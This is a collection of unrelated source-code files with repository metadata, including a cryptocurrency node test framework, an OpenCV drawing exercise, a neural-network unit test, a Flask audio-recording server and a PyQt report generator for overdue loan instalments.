def add_nodes(self, num_nodes, extra_args=None, rpchost=None, timewait=None, binary=None):
"""Instantiate TestNode objects"""
if extra_args is None:
extra_args = [[]] * num_nodes
if binary is None:
binary = [None] * num_nodes
assert_equal(len(extra_args), num_nodes)
assert_equal(len(binary), num_nodes)
for i in range(num_nodes):
self.nodes.append(TestNode(i, self.options.tmpdir, extra_args[i], rpchost, timewait=timewait, binary=binary[i], stderr=None, mocktime=self.mocktime, coverage_dir=self.options.coveragedir))
def start_node(self, i, extra_args=None, stderr=None):
"""Start a sosscoind"""
node = self.nodes[i]
node.start(extra_args, stderr)
node.wait_for_rpc_connection()
if self.options.coveragedir is not None:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def start_nodes(self, extra_args=None):
"""Start multiple sosscoinds"""
if extra_args is None:
extra_args = [None] * self.num_nodes
assert_equal(len(extra_args), self.num_nodes)
try:
for i, node in enumerate(self.nodes):
node.start(extra_args[i])
for node in self.nodes:
node.wait_for_rpc_connection()
except:
# If one node failed to start, stop the others
self.stop_nodes()
raise
if self.options.coveragedir is not None:
for node in self.nodes:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def stop_node(self, i):
"""Stop a bitcoind test node"""
self.nodes[i].stop_node()
self.nodes[i].wait_until_stopped()
def stop_nodes(self):
"""Stop multiple bitcoind test nodes"""
for node in self.nodes:
# Issue RPC to stop nodes
node.stop_node()
for node in self.nodes:
# Wait for nodes to stop
node.wait_until_stopped()
def assert_start_raises_init_error(self, i, extra_args=None, expected_msg=None):
with tempfile.SpooledTemporaryFile(max_size=2**16) as log_stderr:
try:
self.start_node(i, extra_args, stderr=log_stderr)
self.stop_node(i)
except Exception as e:
assert 'sosscoind exited' in str(e) # node must have shutdown
self.nodes[i].running = False
self.nodes[i].process = None
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8')
if expected_msg not in stderr:
raise AssertionError("Expected error \"" + expected_msg + "\" not found in:\n" + stderr)
else:
if expected_msg is None:
assert_msg = "sosscoind should have exited with an error"
else:
assert_msg = "sosscoind should have exited with expected error " + expected_msg
raise AssertionError(assert_msg)
def wait_for_node_exit(self, i, timeout):
self.nodes[i].process.wait(timeout)
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
self.sync_all([self.nodes[:2], self.nodes[2:]])
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes, 1, 2)
self.sync_all()
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
for group in node_groups:
sync_blocks(group)
sync_mempools(group)
def enable_mocktime(self):
"""Enable mocktime for the script.
mocktime may be needed for scripts that use the cached version of the
blockchain. If the cached version of the blockchain is used without
mocktime then the mempools will not sync due to IBD.
For backwared compatibility of the python scripts with previous
versions of the cache, this helper function sets mocktime to Jan 1,
2014 + (201 * 10 * 60)"""
self.mocktime = 1388534400 + (201 * 10 * 60)
def disable_mocktime(self):
self.mocktime = 0
# Private helper methods. These should not be accessed by the subclass test scripts.
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as bitcoind's debug.log with microprecision (so log files can be concatenated and sorted)
formatter = logging.Formatter(fmt='%(asctime)s.%(msecs)03d000 %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("SosscoinRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
def _initialize_chain(self):
"""Initialize a pre-mined blockchain for use by the test.
Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
Afterward, create num_nodes copies from the cache."""
assert self.num_nodes <= MAX_NODES
create_cache = False
for i in range(MAX_NODES):
if not os.path.isdir(os.path.join(self.options.cachedir, 'node' + str(i))):
create_cache = True
break
if create_cache:
self.log.debug("Creating data directories from cached datadir")
# find and delete old cache directories if any exist
for i in range(MAX_NODES):
if os.path.isdir(os.path.join(self.options.cachedir, "node" + str(i))):
shutil.rmtree(os.path.join(self.options.cachedir, "node" + str(i)))
# Create cache directories, run bitcoinds:
for i in range(MAX_NODES):
datadir = initialize_datadir(self.options.cachedir, i)
args = [os.getenv("LITECOIND", "sosscoind"), "-server", "-keypool=1", "-datadir=" + datadir, "-discover=0"]
if i > 0:
args.append("-connect=127.0.0.1:" + str(p2p_port(0)))
self.nodes.append(TestNode(i, self.options.cachedir, extra_args=[], rpchost=None, timewait=None, binary=None, stderr=None, mocktime=self.mocktime, coverage_dir=None))
self.nodes[i].args = args
self.start_node(i)
# Wait for RPC connections to be ready
for node in self.nodes:
node.wait_for_rpc_connection()
# Create a 200-block-long chain; each of the 4 first nodes
# gets 25 mature blocks and 25 immature.
# Note: To preserve compatibility with older versions of
# initialize_chain, only 4 nodes will generate coins.
#
# blocks are created with timestamps 10 minutes apart
# starting from 2010 minutes in the past
self.enable_mocktime()
block_time = self.mocktime - (201 * 10 * 60)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(self.nodes, block_time)
self.nodes[peer].generate(1)
block_time += 10 * 60
# Must sync before next peer starts generating blocks
sync_blocks(self.nodes)
# Shut them down, and clean up cache directories:
self.stop_nodes()
self.nodes = []
self.disable_mocktime()
for i in range(MAX_NODES):
os.remove(log_filename(self.options.cachedir, i, "debug.log"))
os.remove(log_filename(self.options.cachedir, i, "db.log"))
os.remove(log_filename(self.options.cachedir, i, "peers.dat"))
os.remove(log_filename(self.options.cachedir, i, "fee_estimates.dat"))
for i in range(self.num_nodes):
from_dir = os.path.join(self.options.cachedir, "node" + str(i))
to_dir = os.path.join(self.options.tmpdir, "node" + str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(self.options.tmpdir, i) # Overwrite port/rpcport in bitcoin.conf
def _initialize_chain_clean(self):
"""Initialize empty blockchain for use by the test.
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization."""
for i in range(self.num_nodes):
initialize_datadir(self.options.tmpdir, i)
class ComparisonTestFramework(BitcoinTestFramework):
"""Test framework for doing p2p comparison testing
Sets up some sosscoind binaries:
- 1 binary: test binary
- 2 binaries: 1 test binary, 1 ref binary
- n>2 binaries: 1 test binary, n-1 ref binaries"""
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LITECOIND", "sosscoind"),
help="sosscoind binary to test")
parser.add_option("--refbinary", dest="refbinary",
default=os.getenv("LITECOIND", "sosscoind"),
help="sosscoind binary to use for reference nodes (if any)")
def setup_network(self):
extra_args = [['-whitelist=127.0.0.1']] * self.num_nodes
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args,
binary=[self.options.testbinary] +
[self.options.refbinary] * (self.num_nodes - 1))
self.start_nodes()
class SkipTest(Exception):
"""This exception is raised to skip a test"""
def __init__(self, message):
self.message = message
| [
"38661023+zuka2512@users.noreply.github.com"
] | 38661023+zuka2512@users.noreply.github.com |
f693ddebd56136aac4d222c496128c1c7233c17b | 108fac5bd6bc1893953768f8c3aff4b359e2536b | /FreeCodeCamp/01/draw.py | 1af7fa9345e6018816fd9a2abe38d0018bed5ac8 | [] | no_license | rafael-miranda10/freecodecamp_python_opencv | 2bdbe0326e9d6732674aea405d6db70dd561b9ad | 0f52f2a739c4999a375a3e522a561ad74108ea9f | refs/heads/main | 2023-06-02T20:57:56.256127 | 2021-06-19T18:30:49 | 2021-06-19T18:30:49 | 378,475,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | import cv2 as cv
import numpy as np
blank = np.zeros((500,500,3), dtype='uint8')
cv.imshow('Blank', blank)
img = cv.imread('photos/3.jpg')
cv.imshow('Image', img)
#1 - Paint the image a certain colour
#blank[:] = 0,0,255
#blank[200:300, 300:400] = 255,0,0
#cv.imshow('Green', blank)
#2 - Draw a Rectangle
#thickness é referente a linha ou prennchimento
#thickness=2 -> tamanho linha
#thickness=cv.FILLED -> preenchimento total
#cv.rectangle(blank, (0,0), (250,500), (0,255,0), thickness=cv.FILLED )
#cv.rectangle(blank, (0,0), (blank.shape[1]//2, blank.shape[0]//2), (0,255,0), thickness=cv.FILLED )
#cv.imshow('Rectangle', blank)
# 3 draw a circle
#cv.circle(blank, (blank.shape[1]//2, blank.shape[0]//2), 40 , (0,0,255),thickness=-1 )
#cv.imshow('Circle', blank)
# 4 Draw a line
#cv.line(blank, (0,0), (blank.shape[1]//2, blank.shape[0]//2), (255,255,255), thickness=3 )
#cv.imshow('Line', blank)
#5 Write text
cv.putText(blank, 'Hello!', (255,255), cv.FONT_HERSHEY_TRIPLEX, 1.0, (255,0,0), 2)
cv.imshow('Text', blank)
cv.waitKey(0)
#PAREI NO MINUTO 31:55 | [
"43150739+rafael-miranda10@users.noreply.github.com"
] | 43150739+rafael-miranda10@users.noreply.github.com |
3c10deb4991c6f62d15eb76b3a5f1518872491c7 | 112cdec2db27fe43f18f37a4ba785252b323f469 | /python/oneflow/test/modules/test_prelu.py | 351b9aa625a26cfaf11e626ea54d2881e37349f5 | [
"Apache-2.0"
] | permissive | flowone/oneflow | 6be8da189ac6b430d4c4b168afe8184d2db64556 | 3d24b37500292f332727ba69ef86d4809bf6ad67 | refs/heads/master | 2023-07-19T14:12:04.943438 | 2021-09-14T08:32:08 | 2021-09-14T08:32:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,641 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
from automated_test_util import *
from test_util import GenArgList
import oneflow as flow
import oneflow.unittest
@flow.unittest.skip_unless_1n1d()
class TestPReLU(flow.unittest.TestCase):
@autotest()
def test_prelu_4dim_module_with_random_data(test_case):
device = random_device()
x = random_pytorch_tensor(ndim=4, dim1=3).to(device)
m = torch.nn.PReLU(
num_parameters=3 | nothing(), init=random().to(float) | nothing(),
)
m.to(device)
m.train(random())
y = m(x)
return y
@autotest()
def test_prelu_2dim_module_with_random_data(test_case):
device = random_device()
x = random_pytorch_tensor(ndim=2, dim1=3).to(device)
m = torch.nn.PReLU(
num_parameters=3 | nothing(), init=random().to(float) | nothing(),
)
m.to(device)
m.train(random())
y = m(x)
return y
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | flowone.noreply@github.com |
23d3b4c59de4b0bd6da14a5bcc75102bbcc7d84e | a12c1fd7e29891192f295f21823b90b10dc08885 | /Backend/env/bin/python-config | 87aa835ffe5beecf29d4152416ad88c4bff3f5d1 | [] | no_license | DaVinciTachyon/Swiftly | 35bb892550c43a9f1df800680956b15451e720c6 | f815bbb75e72aad14ac73abf87eeda85aecf7ca8 | refs/heads/master | 2020-04-21T02:26:05.065838 | 2019-04-12T10:06:31 | 2019-04-12T10:06:31 | 169,254,430 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | #!/home/darts/Documents/Swiftly/Backend/env/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"davincitachyon@github.com"
] | davincitachyon@github.com | |
fedbec9da50d2695420b0de574fae1ca2f092485 | 18cd0573f59d44a7cba7c8811bd76f42ddbc1870 | /reg2.py | 15fe93adb56bf92ac8b150fa1d0d0a715e70a00e | [] | no_license | mikronavt/pycodes | 775e23a10263e963b153e001bb6e9e426ea90acb | cc9764ff89711034ff47e991fe8f8cf964e73d89 | refs/heads/master | 2020-12-24T09:55:10.362058 | 2016-11-09T07:12:16 | 2016-11-09T07:12:16 | 73,259,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | import sys
import re
for line in sys.stdin:
line = line.rstrip()
p = re.compile(r'\bcat\b')
m = re.search(p, line)
if m is not None:
print(line) | [
"chgb-tol@ya.ru"
] | chgb-tol@ya.ru |
e2f58821bdc51384bfad58f2da79ba7208b170c6 | a114b97fbc3b1a46e5c7f0f9053611205c98ebf4 | /scenarios/testsenery1.0/kongfen/空分测试与统计/change3.py | 95a988d7f5fa96a66e38432ae300427577675791 | [] | no_license | forme12/qualnet- | d4a76f0916623227dfd51b4ed6d23af052e3a69d | 4d8fd82b9d16633f8773f7953c8cc2e0b60a230f | refs/heads/master | 2021-11-03T08:47:08.491807 | 2019-03-25T11:40:26 | 2019-03-25T11:40:26 | 177,569,714 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 919 | py | import os
f = open ('kongfen1.0.app')
lines = f.readlines()
f.close()
for line in lines:
if(line.find('CBR 55 76 1000 512 10 ') == 0):
line = 'CBR 55 76 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
if(line.find('CBR 54 80 1000 512 10 ') == 0):
line = 'CBR 54 80 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
if(line.find('CBR 30 1 1000 512 10 ') == 0):
line = 'CBR 30 1 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
if(line.find('CBR 34 9 1000 512 10 ') == 0):
line = 'CBR 34 9 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
#rs = line.rstrip('\n')
#newname=rs.replace(rs,'CBR 55 76 1000 512 10 40MS 1S 50S Unicast 10S PRECEDENCE 0')
newfile = open('t1.app','a')
newfile.write(line)
newfile.close()
os.unlink('kongfen1.0.app')
os.rename('t1.app','kongfen1.0.app') | [
"2081444098@qq.com"
] | 2081444098@qq.com |
16e32f627660172ba62c9c8293a314dfcb39e346 | 436a9df91964440654da2af8f52d65e28f3a9347 | /flask_server.py | 300040c4c12178f36c469f4f768944ee91f570f5 | [] | no_license | ras9841/TerMINIONator | f7fd481a8db92de5b50086ce736a2b1c32fd2523 | 9dbbfadb09677fd564f1441933290eb0745c3a6e | refs/heads/master | 2021-01-22T06:07:05.597614 | 2017-02-12T16:50:11 | 2017-02-12T16:50:11 | 81,735,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | from flask import Flask
from flask import render_template, request, url_for, redirect
import sys, os
from record import record_audio
from text_analysis import run_analysis
app = Flask(__name__)
@app.route('/record', methods=['GET', 'POST'])
def record():
record_audio(5.0)
os.system("sh speach_text.sh")
uinput = run_analysis()
return redirect(url_for('index', uinput=uinput))
@app.route('/')
@app.route('/<uinput>')
def index(uinput = None):
return render_template('index.html', uinput=uinput)
if __name__ == "__main__":
app.run()
| [
"ras9841@rit.edu"
] | ras9841@rit.edu |
11f73fbe56bc17b3b0a1fd41fe7b785b16cb6ab0 | 4a6d784fd44b57d6b2aabae9d2381884cc880aea | /w_form_cuotas_vencidas_30dias.py | 53a4658d5a415681d07bdf21ca61bb9eac419f7d | [] | no_license | blueautomatic/Slam_Sistema_creditos | 0e46c2f23d396793122739f838073eff77df88e3 | 7eb20a90abce53f10dcd18e3d47e9a5f330acbbd | refs/heads/master | 2020-03-26T19:13:36.634824 | 2018-02-05T15:46:42 | 2018-02-05T15:46:42 | 145,254,325 | 0 | 0 | null | 2018-08-18T21:37:23 | 2018-08-18T21:37:23 | null | UTF-8 | Python | false | false | 13,010 | py | import sys,datetime,os
from PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem
from PyQt5 import uic
from form_cuotas_vencidas_30dias import Ui_form_cuotas_vencidas_30dias
from N_cliente import N_datos_personales_cliente, N_party_address, N_party_otros, N_datos_laborales, N_party_garante,N_party_cliente, N_party_contacto
from N_creditos import N_creditos
from N_cuotas import N_cuotas
from PyQt5.QtCore import pyqtRemoveInputHook
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import getSampleStyleSheet,ParagraphStyle
from reportlab.platypus import Spacer, SimpleDocTemplate, Table, TableStyle
from reportlab.platypus import Paragraph, Image
from reportlab.lib import colors
from PyQt5.QtWidgets import QFileDialog
from E_configuracion import configuracion
import subprocess
class Cuotas_vencidas_30dias(QDialog):
obj_form = Ui_form_cuotas_vencidas_30dias()
listado_cuotas_30_dias = list()
listado_cuotas_60_dias = list()
listado_cuotas_90_dias = list()
def __init__(self):
QDialog.__init__(self)
self.obj_form = Ui_form_cuotas_vencidas_30dias()
self.obj_form.setupUi(self)
self.obj_form.boton_generar.clicked.connect(self.generar_30dias)
self.obj_form.boton_generar_60_dias.clicked.connect(self.generar_60dias)
self.obj_form.boton_generar_90_dias.clicked.connect(self.generar_90dias)
def generar_30dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_30_dias = obj_N_cuotas.lista_cuotas_venc_30_dias()
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,-17))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 30 dias</b> " + str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
for item in self.listado_cuotas_30_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(monto_adeudado)])
t=Table(integrantes, (150,135, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/list_morosos_30dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_30dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : ticket listado_de_morosos_30dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_30dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_30dias.pdf")
def generar_60dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_60_dias = obj_N_cuotas.lista_cuotas_venc_60_dias("slam")
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,10))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 60 dias</b> "+ str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
for item in self.listado_cuotas_60_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
t=Table(integrantes, (150,135, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/list_morosos_60dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_60dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_60dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_60dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_60dias.pdf")
def generar_90dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_90_dias = obj_N_cuotas.lista_cuotas_venc_90_dias("slam")
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,-17))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 90 dias</b> " + str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
for item in self.listado_cuotas_90_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
t=Table(integrantes, (150,155, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/listado_de_morosos_90dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_90dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_90dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_90dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_90dias.pdf")
#app = QApplication(sys.argv)
#dialogo= Cuotas_vencidas_30dias()
#dialogo.show()
#app.exec_()
| [
"lriccombene@gmail.com"
] | lriccombene@gmail.com |
00380198139ffebd0a0320d358b25b1b10ed5d66 | 9b8367ae9b5e9a7b9864c399064950bf6c2f8a12 | /python/ray/experimental/client/api.py | 66ec61c17ab21af933b936f249b82e55e3f10b65 | [
"Apache-2.0",
"MIT"
